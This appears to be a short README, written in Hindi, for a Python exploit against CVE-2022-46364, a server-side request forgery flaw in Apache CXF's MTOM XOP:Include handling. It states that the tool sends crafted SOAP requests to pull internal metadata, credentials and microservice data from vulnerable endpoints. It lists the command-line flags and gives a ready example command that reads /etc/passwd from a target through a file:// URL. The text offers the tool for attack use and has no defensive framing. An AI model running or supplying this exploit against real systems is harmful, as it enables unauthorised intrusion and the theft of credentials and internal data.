
CVE-2022-46364 (Apache CXF SSRF via MTOM XOP:Include) के लिए Python एक्सप्लॉइट। कमजोर एंडपॉइंट्स से आंतरिक मेटाडेटा, क्रेडेंशियल्स और माइक्रोसर्विस डेटा को बाहर निकालने के लिए तैयार SOAP अनुरोध भेजता है।
Apache CXF SSRF via MTOM XOP:Include | CVSS 9.8 गंभीर
Apache CXF < 3.5.5 / < 3.4.10 MTOM-एन्कोडेड SOAP अनुरोधों में अमान्य XOP:Include href विशेषताओं के माध्यम से सर्वर-साइड अनुरोध जालसाजी (SSRF) की अनुमति देता है।
python3 exploit.py -t <TARGET_URL> -s <SSRF_URL> -d <DOMAIN>
-t, --target - असुरक्षित CXF SOAP एंडपॉइंट (आवश्यक)-s, --ssrf-url - डेटा चुराने के लिए आंतरिक URL (आवश्यक)-d, --domain - लक्ष्य डोमेन (डिफ़ॉल्ट: localhost)--plain-soap - MTOM के बजाय सादा SOAP उपयोग करें# /etc/passwd पढ़ें
python3 exploit.py -t http://target.com:8080/employeeservice -s file:///etc/passwd -d target.com